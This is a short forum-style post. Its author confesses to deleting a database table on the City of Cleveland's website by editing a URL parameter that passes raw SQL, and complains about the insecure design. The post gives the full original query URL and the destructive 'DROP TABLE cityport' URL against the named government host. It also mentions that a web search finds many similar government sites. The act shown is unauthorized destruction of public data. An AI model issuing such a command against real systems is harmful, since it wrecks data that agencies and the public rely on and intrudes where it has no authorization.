Shit shit shit, though I hate to admit it, I dropped a table on the city of cleveland's website.

<font size="3">http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=SELECT+Ward%2C+PPN%2C+Street_Number%2C+Street_Name%2C+Frontage_of_Parcel%2C+Depth_of_Parcel%2C+Sqfeet++++%0D%0AFROM+cityport%0D%0AWHERE+Buildescr+%3D+'Non-Buildable'+and+Ward+in+(12%2C+13%2C+14%2C+15%2C+16%2C+17%2C+18%2C+19%2C+20%2C+21)&sql_order=+order+by+'Ward'+ASC&pos=120 turned into</font>

<font size="3">http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=DROP TABLE cityport</font>

Am I going to jail now? Maybe I can find a google cache of the database and manually restore it.

WHO USES sql_querys in the URL and FURTHERMORE who the hell gives that user FULL DATABASE ACCESS, why not just read on certain tables.



The sad AND scary thing is that most of the results I get from that google search are for GOVERNMENT websites. Who the hell are they contracting to do their web work?

